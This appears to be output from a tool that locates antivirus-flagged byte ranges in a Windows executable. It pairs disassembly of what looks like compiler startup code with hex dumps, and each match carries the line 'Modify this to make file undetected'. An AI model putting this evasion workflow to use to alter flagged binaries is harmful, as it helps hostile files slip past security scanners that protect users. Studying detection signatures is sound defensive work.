0x1180: ; CALL XREFS from fcn.004016d9 @ +0x79(x), +0x7e(x)
0x1180: ; DATA XREF from fcn.004027d7 @ 0x4027df(x)
0x1180: 3: fcn.00401d80 ();
0x1180: 0x00401d80 c20000 ret 0
0x1183: ; CALL XREF from fcn.00401d89 @ 0x401d97(x)
0x1183: 6: fcn.00401d83 ();
0x1183: 0x00401d83 b808ac4100 mov eax, 0x41ac08
0x1188: 0x00401d88 c3 ret
0x1189: ; CALL XREF from fcn.004016d9 @ +0xb9(x)
0x1189: 29: fcn.00401d89 ();
0x1189: 0x00401d89 e822f4ffff call fcn.004011b0
0x118e: 0x00401d8e 8b4804 mov ecx, dword [eax + 4]
0x1191: 0x00401d91 830824 or dword [eax], 0x24 ; [0x24:4]=-1 ; 36
0x1194: 0x00401d94 894804 mov dword [eax + 4], ecx
0x1197: 0x00401d97 e8e7ffffff call fcn.00401d83
0x119c: 0x00401d9c 8b4804 mov ecx, dword [eax + 4]
0x119f: 0x00401d9f 830802 or dword [eax], 2
0x11a2: 0x00401da2 894804 mov dword [eax + 4], ecx
0x11a5: 0x00401da5 c3 ret
0x11a6: ; CALL XREF from fcn.004016d9 @ +0x65(x)
0x11a6: 12: fcn.00401da6 ();
0x11a6: 0x00401da6 33c0 xor eax, eax
0x11a8: 0x00401da8 39050ca04100 cmp dword [0x41a00c], eax ; [0x41a00c:4]=1
0x11ae: 0x00401dae 0f94c0 sete al
0x11b1: 0x00401db1 c3 ret
0x11b2: ; CALL XREF from entry0 @ 0x401844(x)
0x11b2: 6: fcn.00401db2 ();
0x11b2: 0x00401db2 b8f0b34100 mov eax, 0x41b3f0
0x11b7: 0x00401db7 c3 ret
0x11b8: ; CALL XREF from entry0 @ 0x40186c(x)
0x11b8: 6: fcn.00401db8 ();
0x11b8: 0x00401db8 b8ecb34100 mov eax, 0x41b3ec
0x11bd: 0x00401dbd c3 ret
0x11be: ; CALL XREFS from entry0 @ 0xb3(x), 0x40191a(x)
0x11be: ; CALL XREF from fcn.00401b09 @ 0x401b8a(x)
0x11be: ; CALL XREF from fcn.00401d5f @ 0x401d7a(x)
0x11be: 283: fcn.00401dbe (int32_t arg_4h, int32_t arg_8h);
0x11be: ; arg int32_t arg_4h @ ebp+0x4
0x11be: ; arg int32_t arg_8h @ ebp+0x8
0x11be: ; var int32_t var_4h @ ebp-0x4
0x11be: ; var struct _EXCEPTION_POINTERS *ExceptionInfo @ ebp-0x8
0x11be: ; var int32_t var_4ch @ ebp-0x4c
0x11be: ; var int32_t var_54h @ ebp-0x54
0x11be: ; var int32_t var_58h @ ebp-0x58
0x11be: ; var int32_t var_25ch @ ebp-0x25c
0x11be: ; var int32_t var_260h @ ebp-0x260
0x11be: ; var int32_t var_264h @ ebp-0x264
0x11be: ; var int32_t var_268h @ ebp-0x268
0x11be: ; var int32_t var_26ch @ ebp-0x26c
0x11be: ; var int32_t var_270h @ ebp-0x270
0x11be: ; var int32_t var_274h @ ebp-0x274
0x11be: ; var int32_t var_278h @ ebp-0x278
0x11be: ; var int32_t var_27ch @ ebp-0x27c
0x11be: ; var int32_t var_280h @ ebp-0x280
0x11be: ; var int32_t var_284h @ ebp-0x284
0x11be: ; var int32_t var_288h @ ebp-0x288
0x11be: ; var int32_t var_28ch @ ebp-0x28c
0x11be: ; var int32_t var_290h @ ebp-0x290
0x11be: ; var int32_t var_294h @ ebp-0x294
0x11be: ; var int32_t var_298h @ ebp-0x298
0x11be: ; var int32_t var_324h @ ebp-0x324
0x11be: 0x00401dbe 55 push ebp
0x11bf: 0x00401dbf 8bec mov ebp, esp
0x11c1: 0x00401dc1 81ec24030000 sub esp, 0x324
0x11c7: 0x00401dc7 53 push ebx
0x11c8: 0x00401dc8 6a17 push 0x17 ; 23 ; DWORD ProcessorFeature
0x11ca: 0x00401dca ff invalid
0x11cb: 0x00401dcb 15 invalid
0x11cc: 0x00401dcc 1c20 sbb al, 0x20
0x11ce: 0x00401dce 41 inc ecx

Match 12: 4815 (size: 17)

Dominant. Modify this to make file undetected

.text

000012CF   03 E8 AE 00 00 00 59 5B C9 C3 E9 65 FE FF FF 6A    ......Y[...e...j
000012DF   00                                                 .

0x12bf: 0x00401ebf 50 push eax ; struct _EXCEPTION_POINTERS *ExceptionInfo
0x12c0: 0x00401ec0 ff150c204100 call dword [sym.imp.KERNEL32.dll_UnhandledExceptionFilter] ; 0x41200c ; LONG UnhandledExceptionFilter(struct _EXCEPTION_POINTERS *ExceptionInfo)
0x12c6: 0x00401ec6 85c0 test eax, eax
0x12c8: < 0x00401ec8 750c jne 0x401ed6
0x12ca: 0x00401eca 84db test bl, bl
0x12cc: < 0x00401ecc 7508 jne 0x401ed6
0x12ce: 0x00401ece 6a03 push 3 ; 3
0x12d0: 0x00401ed0 e8ae000000 call fcn.00401f83
0x12d5: 0x00401ed5 59 pop ecx
0x12d6: ; CODE XREFS from fcn.00401dbe @ 0x401ec8(x), 0x401ecc(x)
0x12d6: > 0x00401ed6 5b pop ebx
0x12d7: 0x00401ed7 c9 leave
0x12d8: 0x00401ed8 c3 ret
0x12d9: ; CALL XREF from fcn.004016d9 @ +0xa7(x)
0x12d9: 5: fcn.00401ed9 ();
0x12d9: < 0x00401ed9 e965feffff jmp fcn.00401d43
0x12de: ; CALL XREF from entry0 @ 0x4018ab(x)
0x12de: ; CALL XREF from fcn.004016d9 @ +0x211(x)
0x12de: ; CALL XREF from fcn.00405938 @ 0x405946(x)
0x12de: 67: fcn.00401ede ();
0x12de: 0x00401ede 6a00 push 0 ; LPCWSTR lpModuleName
0x12e0: 0x00401ee0 ff153c204100 call dword [sym.imp.KERNEL32.dll_GetModuleHandleW] ; 0x41203c ; HMODULE GetModuleHandleW(LPCWSTR lpModuleName)
0x12e6: 0x00401ee6 85c0 test eax, eax
0x12e8: < 0x00401ee8 7434 je 0x401f1e
0x12ea: 0x00401eea b94d5a0000 mov ecx, 0x5a4d ; 'MZ'
0x12ef: 0x00401eef 66 invalid

Match 13: 4883 (size: 34)

Dominant. Modify this to make file undetected

.text

00001313   B9 E8 00 00 00 00 74 03 B0 01 C3 32 C0 C3 68 2D    ......t....2..h-
00001323   1F 40 00 FF 15 10 20 41 00 C3 55 8B EC 56 57 8B    .@.... A..U..VW.
00001333   7D 08                                              }.

0x1306: 0x00401f06 66394118 cmp word [ecx + 0x18], ax
0x130a: < 0x00401f0a 7512 jne 0x401f1e
0x130c: 0x00401f0c 8379740e cmp dword [ecx + 0x74], 0xe
0x1310: < 0x00401f10 760c jbe 0x401f1e
0x1312: 0x00401f12 83b9e8000000. cmp dword [ecx + 0xe8], 0
0x1319: < 0x00401f19 7403 je 0x401f1e
0x131b: 0x00401f1b b001 mov al, 1
0x131d: 0x00401f1d c3 ret
0x131e: ; XREFS: CODE 0x00401ee8 CODE 0x00401ef2 CODE 0x00401eff
0x131e: ; XREFS: CODE 0x00401f0a CODE 0x00401f10 CODE 0x00401f19
0x131e: > 0x00401f1e 32c0 xor al, al
0x1320: 0x00401f20 c3 ret
0x1321: ; CALL XREF from fcn.004016d9 @ +0xc1(x)
0x1321: 12: fcn.00401f21 ();
0x1321: 0x00401f21 682d1f4000 push 0x401f2d ; '-\x1f@' ; LPTOP_LEVEL_EXCEPTION_FILTER lpTopLevelExceptionFilter
0x1326: 0x00401f26 ff1510204100 call dword [sym.imp.KERNEL32.dll_SetUnhandledExceptionFilter] ; 0x412010 ; LPTOP_LEVEL_EXCEPTION_FILTER SetUnhandledExceptionFilter(LPTOP_LEVEL_EXCEPTION_FILTER lpTopLevelExceptionFilter)
0x132c: 0x00401f2c c3 ret
0x132d: ; DATA XREF from fcn.00401f21 @ 0x401f21(r)
0x132d: 0x00401f2d 55 push ebp
0x132e: 0x00401f2e 8bec mov ebp, esp
0x1330: 0x00401f30 56 push esi
0x1331: 0x00401f31 57 push edi
0x1332: 0x00401f32 8b7d08 mov edi, dword [ebp + 8]
0x1335: 0x00401f35 8b37 mov esi, dword [edi]
0x1337: 0x00401f37 813e63736de0 cmp dword [esi], 0xe06d7363
0x133d: < 0x00401f3d 7525 jne 0x401f64
0x133f: 0x00401f3f 837e1003 cmp dword [esi + 0x10], 3
0x1343: < 0x00401f43 751f jne 0x401f64

Match 14: 5002 (size: 17)

Dominant. Modify this to make file undetected

.text

0000138A   C3 53 56 BE F8 8E 41 00 BB F8 8E 41 00 3B F3 73    .SV...A....A.;.s
0000139A   19                                                 .

0x137b: 0x00401f7b 8930 mov dword [eax], esi
0x137d: 0x00401f7d e8c2410000 call fcn.00406144
0x1382: 0x00401f82 cc int3
0x1383: ; CALL XREFS from fcn.00401dbe @ 0x401ddb(x), 0x401ed0(x)
0x1383: ; CALL XREFS from fcn.00406942 @ 0x406961(x), 0x406a68(x)
0x1383: 8: fcn.00401f83 ();
0x1383: 0x00401f83 832510ac4100. and dword [0x41ac10], 0 ; [0x41ac10:4]=0
0x138a: 0x00401f8a c3 ret
0x138b: ; CALL XREF from fcn.004016d9 @ +0x40(x)
0x138b: 44: fcn.00401f8b ();
0x138b: 0x00401f8b 53 push ebx
0x138c: 0x00401f8c 56 push esi
0x138d: 0x00401f8d bef88e4100 mov esi, 0x418ef8
0x1392: 0x00401f92 bbf88e4100 mov ebx, 0x418ef8
0x1397: 0x00401f97 3bf3 cmp esi, ebx
0x1399: < 0x00401f99 7319 jae 0x401fb4
0x139b: 0x00401f9b 57 push edi
0x139c: ; CODE XREF from fcn.00401f8b @ 0x401fb1(x)
0x139c: 0x00401f9c 8b3e mov edi, dword [esi]
0x139e: 0x00401f9e 85ff test edi, edi
0x13a0: < 0x00401fa0 740a je 0x401fac
0x13a2: 0x00401fa2 8bcf mov ecx, edi
0x13a4: 0x00401fa4 ff1520214100 call dword [0x412120]
0x13aa: 0x00401faa ff invalid

Match 15: 5036 (size: 17)

Dominant. Modify this to make file undetected

.text

000013AC   83 C6 04 3B F3 72 E9 5F 5E 5B C3 53 56 BE 00 8F    ...;.r._^[.SV...
000013BC   41                                                 A

0x139c: ; CODE XREF from fcn.00401f8b @ 0x401fb1(x)
0x139c: > 0x00401f9c 8b3e mov edi, dword [esi]
0x139e: 0x00401f9e 85ff test edi, edi
0x13a0: < 0x00401fa0 740a je 0x401fac
0x13a2: 0x00401fa2 8bcf mov ecx, edi
0x13a4: 0x00401fa4 ff1520214100 call dword [0x412120]
0x13aa: 0x00401faa ffd7 call edi
0x13ac: ; CODE XREF from fcn.00401f8b @ 0x401fa0(x)
0x13ac: > 0x00401fac 83c604 add esi, 4
0x13af: 0x00401faf 3bf3 cmp esi, ebx
0x13b1: < 0x00401fb1 72e9 jb 0x401f9c
0x13b3: 0x00401fb3 5f pop edi
0x13b4: ; CODE XREF from fcn.00401f8b @ 0x401f99(x)
0x13b4: > 0x00401fb4 5e pop esi
0x13b5: 0x00401fb5 5b pop ebx
0x13b6: 0x00401fb6 c3 ret
0x13b7: ; DATA XREF from fcn.004016d9 @ +0x45(r)
0x13b7: 0x00401fb7 53 push ebx
0x13b8: 0x00401fb8 56 push esi
0x13b9: 0x00401fb9 be008f4100 mov esi, 0x418f00
0x13be: 0x00401fbe bb008f4100 mov ebx, 0x418f00
0x13c3: 0x00401fc3 3bf3 cmp esi, ebx
0x13c5: < 0x00401fc5 7319 jae 0x401fe0
0x13c7: 0x00401fc7 57 push edi
0x13c8: ; CODE XREF from fcn.00401f8b @ +0x52(x)
0x13c8: 0x00401fc8 8b3e mov edi, dword [esi]
0x13ca: 0x00401fca 85ff test edi, edi
0x13cc: 0x00401fcc 74 invalid

Match 16: 5104 (size: 187)

Dominant. Modify this to make file undetected

.text

000013F0   68 60 22 40 00 64 FF 35 00 00 00 00 8B 44 24 10    h`"@.d.5.....D$.
00001400   89 6C 24 10 8D 6C 24 10 2B E0 53 56 57 A1 04 A0    .l$..l$.+.SVW...
00001410   41 00 31 45 FC 33 C5 50 89 65 E8 FF 75 F8 8B 45    A.1E.3.P.e..u..E
00001420   FC C7 45 FC FE FF FF FF 89 45 F8 8D 45 F0 64 A3    ..E......E..E.d.
00001430   00 00 00 00 C3 55 8B EC 83 25 18 AC 41 00 00 83    .....U...%..A...
00001440   EC 24 83 0D 10 A0 41 00 01 6A 0A FF 15 1C 20 41    .$....A..j.... A
00001450   00 85 C0 0F 84 A9 01 00 00 83 65 F0 00 33 C0 53    ..........e..3.S
00001460   56 57 33 C9 8D 7D DC 53 0F A2 8B F3 5B 89 07 89    VW3..}.S....[...
00001470   77 04 89 4F 08 33 C9 89 57 0C 8B 45 DC 8B 7D E4    w..O.3..W..E..}.
00001480   89 45 F4 81 F7 6E 74 65 6C 8B 45 E8 35 69 6E 65    .E...ntel.E.5ine
00001490   49 89 45 F8 8B 45 E0 35 47 65 6E 75 89 45 FC 33    I.E..E.5Genu.E.3
000014A0   C0 40 53 0F A2 8B F3 5B 8D 5D DC                   .@S....[.].

0x13e0: ; CODE XREF from fcn.00401f8b @ +0x3a(x)
0x13e0: > 0x00401fe0 5e pop esi
0x13e1: 0x00401fe1 5b pop ebx
0x13e2: 0x00401fe2 c3 ret
0x13e3: 0x00401fe3 cc int3
0x13e4: 0x00401fe4 cc int3
0x13e5: 0x00401fe5 cc int3
0x13e6: 0x00401fe6 cc int3
0x13e7: 0x00401fe7 cc int3
0x13e8: 0x00401fe8 cc int3
0x13e9: 0x00401fe9 cc int3
0x13ea: 0x00401fea cc int3
0x13eb: 0x00401feb cc int3
0x13ec: 0x00401fec cc int3
0x13ed: 0x00401fed cc int3
0x13ee: 0x00401fee cc int3
0x13ef: 0x00401fef cc int3
0x13f0: ; XREFS(31)
0x13f0: 69: fcn.00401ff0 (int32_t arg_10h);
0x13f0: ; var int32_t var_4h @ ebp+0x1c
0x13f0: ; var int32_t var_18h @ ebp+0x8
0x13f0: ; var int32_t var_4h_2 @ ebp-0x4
0x13f0: ; var int32_t var_8h @ ebp-0x8
0x13f0: ; var int32_t var_10h @ ebp-0x10
0x13f0: ; arg int32_t arg_10h @ esp+0x24
0x13f0: 0x00401ff0 6860224000 push 0x402260 ; '`\"@' ; "U\x8b\xec\x83\xec\x1cS\x8b]\bVW\xc6E\xff"
0x13f5: 0x00401ff5 64ff35000000. push dword fs:[0]
0x13fc: 0x00401ffc 8b442410 mov eax, dword [arg_10h]
0x1400: 0x00402000 896c2410 mov dword [arg_10h], ebp
0x1404: 0x00402004 8d6c2410 lea ebp, [arg_10h]
0x1408: 0x00402008 2be0 sub esp, eax
0x140a: 0x0040200a 53 push ebx
0x140b: 0x0040200b 56 push esi
0x140c: 0x0040200c 57 push edi
0x140d: 0x0040200d a104a04100 mov eax, dword [0x41a004] ; [0x41a004:4]=0xbb40e64e
0x1412: 0x00402012 3145fc xor dword [var_4h], eax
0x1415: 0x00402015 33c5 xor eax, ebp
0x1417: 0x00402017 50 push eax
0x1418: 0x00402018 8965e8 mov dword [var_18h], esp
0x141b: 0x0040201b ff75f8 push dword [var_8h]
0x141e: 0x0040201e 8b45fc mov eax, dword [var_4h_2]
0x1421: 0x00402021 c745fcfeffff. mov dword [var_4h_2], 0xfffffffe ; 4294967294
0x1428: 0x00402028 8945f8 mov dword [var_8h], eax
0x142b: 0x0040202b 8d45f0 lea eax, [var_10h]
0x142e: 0x0040202e 64a300000000 mov dword fs:[0], eax
0x1434: 0x00402034 c3 ret
0x1435: ; CALL XREF from fcn.00401ad0 @ 0x401ae0(x)
0x1435: 465: fcn.00402035 ();
0x1435: ; var int32_t var_4h @ ebp-0x4
0x1435: ; var int32_t var_8h @ ebp-0x8
0x1435: ; var signed int var_ch @ ebp-0xc
0x1435: ; var int32_t var_10h @ ebp-0x10
0x1435: ; var int32_t var_14h @ ebp-0x14
0x1435: ; var int32_t var_18h @ ebp-0x18
0x1435: ; var int32_t var_1ch @ ebp-0x1c
0x1435: ; var int32_t var_20h @ ebp-0x20
0x1435: ; var int32_t var_24h @ ebp-0x24
0x1435: 0x00402035 55 push ebp
0x1436: 0x00402036 8bec mov ebp, esp
0x1438: 0x00402038 832518ac4100. and dword [0x41ac18], 0 ; [0x41ac18:4]=0
0x143f: 0x0040203f 83ec24 sub esp, 0x24
0x1442: 0x00402042 830d10a04100. or dword [0x41a010], 1 ; [0x41a010:4]=1
0x1449: 0x00402049 6a0a push 0xa ; 10 ; DWORD ProcessorFeature
0x144b: 0x0040204b ff151c204100 call dword [sym.imp.KERNEL32.dll_IsProcessorFeaturePresent] ; 0x41201c ; ".\x95\x01" ; BOOL IsProcessorFeaturePresent(DWORD ProcessorFeature)
0x1451: 0x00402051 85c0 test eax, eax
0x1453: < 0x00402053 0f84a9010000 je 0x402202
0x1459: 0x00402059 8365f000 and dword [var_10h], 0
0x145d: 0x0040205d 33c0 xor eax, eax
0x145f: 0x0040205f 53 push ebx
0x1460: 0x00402060 56 push esi
0x1461: 0x00402061 57 push edi
0x1462: 0x00402062 33c9 xor ecx, ecx
0x1464: 0x00402064 8d7ddc lea edi, [var_24h]
0x1467: 0x00402067 53 push ebx
0x1468: 0x00402068 0fa2 cpuid
0x146a: 0x0040206a 8bf3 mov esi, ebx
0x146c: 0x0040206c 5b pop ebx
0x146d: 0x0040206d 8907 mov dword [edi], eax
0x146f: 0x0040206f 897704 mov dword [edi + 4], esi
0x1472: 0x00402072 894f08 mov dword [edi + 8], ecx
0x1475: 0x00402075 33c9 xor ecx, ecx
0x1477: 0x00402077 89570c mov dword [edi + 0xc], edx
0x147a: 0x0040207a 8b45dc mov eax, dword [var_24h]
0x147d: 0x0040207d 8b7de4 mov edi, dword [var_1ch]
0x1480: 0x00402080 8945f4 mov dword [var_ch], eax
0x1483: 0x00402083 81f76e74656c xor edi, 0x6c65746e
0x1489: 0x00402089 8b45e8 mov eax, dword [var_18h]
0x148c: 0x0040208c 35696e6549 xor eax, 0x49656e69
0x1491: 0x00402091 8945f8 mov dword [var_8h], eax
0x1494: 0x00402094 8b45e0 mov eax, dword [var_20h]
0x1497: 0x00402097 3547656e75 xor eax, 0x756e6547
0x149c: 0x0040209c 8945fc mov dword [var_4h], eax
0x149f: 0x0040209f 33c0 xor eax, eax
0x14a1: 0x004020a1 40 inc eax
0x14a2: 0x004020a2 53 push ebx
0x14a3: 0x004020a3 0fa2 cpuid
0x14a5: 0x004020a5 8bf3 mov esi, ebx
0x14a7: 0x004020a7 5b pop ebx
0x14a8: 0x004020a8 8d5ddc lea ebx, [var_24h]
0x14ab: 0x004020ab 8903 mov dword [ebx], eax
0x14ad: 0x004020ad 8b45fc mov eax, dword [var_4h]
0x14b0: 0x004020b0 897304 mov dword [ebx + 4], esi
0x14b3: 0x004020b3 0bc7 or eax, edi
0x14b5: 0x004020b5 0b45f8 or eax, dword [var_8h]
0x14b8: 0x004020b8 894b08 mov dword [ebx + 8], ecx

Match 17: 5308 (size: 17)

Dominant. Modify this to make file undetected

.text

000014BC   53 0C 75 43 8B 45 DC 25 F0 3F FF 0F 3D C0 06 01    S.uC.E.%.?..=...
000014CC   00                                                 .

0x14ad: 0x004020ad 8b45fc mov eax, dword [var_4h]
0x14b0: 0x004020b0 897304 mov dword [ebx + 4], esi
0x14b3: 0x004020b3 0bc7 or eax, edi
0x14b5: 0x004020b5 0b45f8 or eax, dword [var_8h]
0x14b8: 0x004020b8 894b08 mov dword [ebx + 8], ecx
0x14bb: 0x004020bb 89530c mov dword [ebx + 0xc], edx
0x14be: < 0x004020be 7543 jne 0x402103
0x14c0: 0x004020c0 8b45dc mov eax, dword [var_24h]
0x14c3: 0x004020c3 25f03fff0f and eax, 0xfff3ff0
0x14c8: 0x004020c8 3dc0060100 cmp eax, 0x106c0
0x14cd: < 0x004020cd 7423 je 0x4020f2
0x14cf: 0x004020cf 3d60060200 cmp eax, 0x20660
0x14d4: < 0x004020d4 741c je 0x4020f2
0x14d6: 0x004020d6 3d70060200 cmp eax, 0x20670
0x14db: < 0x004020db 7415 je 0x4020f2

Match 18: 5376 (size: 136)

Dominant. Modify this to make file undetected

.text

00001500   00 EB 06 8B 3D 1C AC 41 00 8B 4D E4 6A 07 58 89    ....=..A..M.j.X.
00001510   4D FC 39 45 F4 7C 2F 33 C9 53 0F A2 8B F3 5B 8D    M.9E.|/3.S....[.
00001520   5D DC 89 03 89 73 04 89 4B 08 8B 4D FC 89 53 0C    ]....s..K..M..S.
00001530   8B 5D E0 F7 C3 00 02 00 00 74 0E 83 CF 02 89 3D    .].......t.....=
00001540   1C AC 41 00 EB 03 8B 5D F0 A1 10 A0 41 00 83 C8    ..A....]....A...
00001550   02 C7 05 18 AC 41 00 01 00 00 00 A3 10 A0 41 00    .....A........A.
00001560   F7 C1 00 00 10 00 0F 84 93 00 00 00 83 C8 04 C7    ................
00001570   05 18 AC 41 00 02 00 00 00 A3 10 A0 41 00 F7 C1    ...A........A...
00001580   00 00 00 08 74 79 F7 C1                            ....ty..

0x14f0: < 0x004020f0 7511 jne 0x402103
0x14f2: ; CODE XREFS from fcn.00402035 @ 0x4020cd(x), 0x4020d4(x), 0x4020db(x), 0x4020e2(x), 0x4020e9(x)
0x14f2: > 0x004020f2 8b3d1cac4100 mov edi, dword [0x41ac1c] ; [0x41ac1c:4]=0
0x14f8: 0x004020f8 83cf01 or edi, 1
0x14fb: 0x004020fb 893d1cac4100 mov dword [0x41ac1c], edi ; [0x41ac1c:4]=0
0x1501: < 0x00402101 eb06 jmp 0x402109
0x1503: ; CODE XREFS from fcn.00402035 @ 0x4020be(x), 0x4020f0(x)
0x1503: > 0x00402103 8b3d1cac4100 mov edi, dword [0x41ac1c] ; [0x41ac1c:4]=0
0x1509: ; CODE XREF from fcn.00402035 @ 0x402101(x)
0x1509: > 0x00402109 8b4de4 mov ecx, dword [var_1ch]
0x150c: 0x0040210c 6a07 push 7 ; 7
0x150e: 0x0040210e 58 pop eax
0x150f: 0x0040210f 894dfc mov dword [var_4h], ecx
0x1512: 0x00402112 3945f4 cmp dword [var_ch], eax
0x1515: < 0x00402115 7c2f jl 0x402146
0x1517: 0x00402117 33c9 xor ecx, ecx
0x1519: 0x00402119 53 push ebx
0x151a: 0x0040211a 0fa2 cpuid
0x151c: 0x0040211c 8bf3 mov esi, ebx
0x151e: 0x0040211e 5b pop ebx
0x151f: 0x0040211f 8d5ddc lea ebx, [var_24h]
0x1522: 0x00402122 8903 mov dword [ebx], eax
0x1524: 0x00402124 897304 mov dword [ebx + 4], esi
0x1527: 0x00402127 894b08 mov dword [ebx + 8], ecx
0x152a: 0x0040212a 8b4dfc mov ecx, dword [var_4h]
0x152d: 0x0040212d 89530c mov dword [ebx + 0xc], edx
0x1530: 0x00402130 8b5de0 mov ebx, dword [var_20h]
0x1533: 0x00402133 f7c300020000 test ebx, 0x200 ; 512
0x1539: < 0x00402139 740e je 0x402149
0x153b: 0x0040213b 83cf02 or edi, 2
0x153e: 0x0040213e 893d1cac4100 mov dword [0x41ac1c], edi ; [0x41ac1c:4]=0
0x1544: < 0x00402144 eb03 jmp 0x402149
0x1546: ; CODE XREF from fcn.00402035 @ 0x402115(x)
0x1546: > 0x00402146 8b5df0 mov ebx, dword [var_10h]
0x1549: ; CODE XREFS from fcn.00402035 @ 0x402139(x), 0x402144(x)
0x1549: > 0x00402149 a110a04100 mov eax, dword [0x41a010] ; [0x41a010:4]=1
0x154e: 0x0040214e 83c802 or eax, 2
0x1551: 0x00402151 c70518ac4100. mov dword [0x41ac18], 1 ; [0x41ac18:4]=0
0x155b: 0x0040215b a310a04100 mov dword [0x41a010], eax ; [0x41a010:4]=1
0x1560: 0x00402160 f7c100001000 test ecx, 0x100000
0x1566: < 0x00402166 0f8493000000 je 0x4021ff
0x156c: 0x0040216c 83c804 or eax, 4
0x156f: 0x0040216f c70518ac4100. mov dword [0x41ac18], 2 ; [0x41ac18:4]=0
0x1579: 0x00402179 a310a04100 mov dword [0x41a010], eax ; [0x41a010:4]=1
0x157e: 0x0040217e f7c100000008 test ecx, 0x8000000
0x1584: < 0x00402184 7479 je 0x4021ff
0x1586: 0x00402186 f7c100000010 test ecx, 0x10000000
0x158c: < 0x0040218c 7471 je 0x4021ff
0x158e: 0x0040218e 33c9 xor ecx, ecx
0x1590: 0x00402190 0f01d0 xgetbv
0x1593: 0x00402193 8945ec mov dword [var_14h], eax
0x1596: 0x00402196 89 invalid
0x1597: 0x00402197 55 push ebp

Match 19: 5614 (size: 68)

Dominant. Modify this to make file undetected

.text

000015EE   3B C2 75 0D 83 0D 10 A0 41 00 40 89 35 18 AC 41    ;.u.....A.@.5..A
000015FE   00 5F 5E 5B 33 C0 C9 C3 33 C0 39 05 E8 B3 41 00    ._^[3...3.9...A.
0000160E   0F 95 C0 C3 CC CC CC CC CC CC CC CC CC CC CC CC    ................
0000161E   CC CC 55 8B EC 56 8B 75 08 57 8B 7D 0C 8B 06 83    ..U..V.u.W.}....
0000162E   F8 FE 74 0D                                        ..t.

0x15df: < 0x004021df 751e jne 0x4021ff
0x15e1: 0x004021e1 8b45ec mov eax, dword [var_14h]
0x15e4: 0x004021e4 bae0000000 mov edx, 0xe0 ; 224
0x15e9: 0x004021e9 8b4df0 mov ecx, dword [var_10h]
0x15ec: 0x004021ec 23c2 and eax, edx
0x15ee: 0x004021ee 3bc2 cmp eax, edx
0x15f0: < 0x004021f0 750d jne 0x4021ff
0x15f2: 0x004021f2 830d10a04100. or dword [0x41a010], 0x40 ; [0x41a010:4]=1
0x15f9: 0x004021f9 893518ac4100 mov dword [0x41ac18], esi ; [0x41ac18:4]=0
0x15ff: ; XREFS: CODE 0x00402166 CODE 0x00402184 CODE 0x0040218c
0x15ff: ; XREFS: CODE 0x004021a6 CODE 0x004021c2 CODE 0x004021df
0x15ff: ; XREFS: CODE 0x004021f0
0x15ff: > 0x004021ff 5f pop edi
0x1600: 0x00402200 5e pop esi
0x1601: 0x00402201 5b pop ebx
0x1602: ; CODE XREF from fcn.00402035 @ 0x402053(x)
0x1602: 0x00402202 33c0 xor eax, eax
0x1604: 0x00402204 c9 leave
0x1605: 0x00402205 c3 ret
0x1606: ; CALL XREF from fcn.00401a9e @ 0x401a9f(x)
0x1606: ; CALL XREF from fcn.00401b09 @ 0x401b26(x)
0x1606: ; CALL XREF from fcn.00401c24 @ 0x401c27(x)
0x1606: 12: fcn.00402206 ();
0x1606: 0x00402206 33c0 xor eax, eax
0x1608: 0x00402208 3905e8b34100 cmp dword [0x41b3e8], eax ; [0x41b3e8:4]=0
0x160e: 0x0040220e 0f95c0 setne al
0x1611: 0x00402211 c3 ret
0x1612: 0x00402212 cc int3
0x1613: 0x00402213 cc int3
0x1614: 0x00402214 cc int3
0x1615: 0x00402215 cc int3
0x1616: 0x00402216 cc int3
0x1617: 0x00402217 cc int3
0x1618: 0x00402218 cc int3
0x1619: 0x00402219 cc int3
0x161a: 0x0040221a cc int3
0x161b: 0x0040221b cc int3
0x161c: 0x0040221c cc int3
0x161d: 0x0040221d cc int3
0x161e: 0x0040221e cc int3
0x161f: 0x0040221f cc int3
0x1620: ; CALL XREFS from fcn.00402220 @ +0x77(x), +0x108(x), +0x188(x)
0x1620: 50: fcn.00402220 (int32_t arg_8h, int32_t arg_ch);
0x1620: ; arg int32_t arg_8h @ ebp+0x8
0x1620: ; arg int32_t arg_ch @ ebp+0xc
0x1620: 0x00402220 55 push ebp
0x1621: 0x00402221 8bec mov ebp, esp
0x1623: 0x00402223 56 push esi
0x1624: 0x00402224 8b7508 mov esi, dword [arg_8h]
0x1627: 0x00402227 57 push edi
0x1628: 0x00402228 8b7d0c mov edi, dword [arg_ch]
0x162b: 0x0040222b 8b06 mov eax, dword [esi]
0x162d: 0x0040222d 83f8fe cmp eax, 0xfffffffe
0x1630: < 0x00402230 740d je 0x40223f
0x1632: 0x00402232 8b4e04 mov ecx, dword [esi + 4]
0x1635: 0x00402235 03cf add ecx, edi
0x1637: 0x00402237 330c38 xor ecx, dword [eax + edi]
0x163a: 0x0040223a e89af4ffff call fcn.004016d9
0x163f: ; CODE XREF from fcn.00402220 @ 0x402230(x)
0x163f: > 0x0040223f 8b4608 mov eax, dword [esi + 8]

Match 20: 6056 (size: 68)

Dominant. Modify this to make file undetected

.text

000017A8   E8 73 FE FF FF 8B 4D EC 83 C4 08 8B D6 8B 49 08    .s....M.......I.
000017B8   E8 C3 03 00 00 CC E8 4E 05 00 00 84 C0 75 03 32    .......N.....u.2
000017C8   C0 C3 E8 F4 04 00 00 84 C0 75 07 E8 75 05 00 00    .........u..u...
000017D8   EB ED B0 01 C3 55 8B EC 80 7D 08 00 75 0A E8 0B    .....U...}..u...
000017E8   05 00 00 E8                                        ....

0x1799: 0x00402399 e822040000 call fcn.004027c0
0x179e: 0x0040239e 8b450c mov eax, dword [ebp + 0xc]
0x17a1: ; CODE XREF from fcn.00402220 @ +0x16d(x)
0x17a1: > 0x004023a1 56 push esi
0x17a2: 0x004023a2 ff75f8 push dword [ebp - 8]
0x17a5: 0x004023a5 89580c mov dword [eax + 0xc], ebx
0x17a8: 0x004023a8 e873feffff call fcn.00402220
0x17ad: 0x004023ad 8b4dec mov ecx, dword [ebp - 0x14]
0x17b0: 0x004023b0 83c408 add esp, 8
0x17b3: 0x004023b3 8bd6 mov edx, esi
0x17b5: 0x004023b5 8b4908 mov ecx, dword [ecx + 8]
0x17b8: 0x004023b8 e8c3030000 call fcn.00402780
0x17bd: 0x004023bd cc int3
0x17be: ; CALL XREF from fcn.00401ad0 @ 0x401ae5(x)
0x17be: 31: fcn.004023be ();
0x17be: 0x004023be e84e050000 call fcn.00402911
0x17c3: 0x004023c3 84c0 test al, al
0x17c5: < 0x004023c5 7503 jne 0x4023ca
0x17c7: ; CODE XREF from fcn.004023be @ 0x4023d8(x)
0x17c7: > 0x004023c7 32c0 xor al, al
0x17c9: 0x004023c9 c3 ret
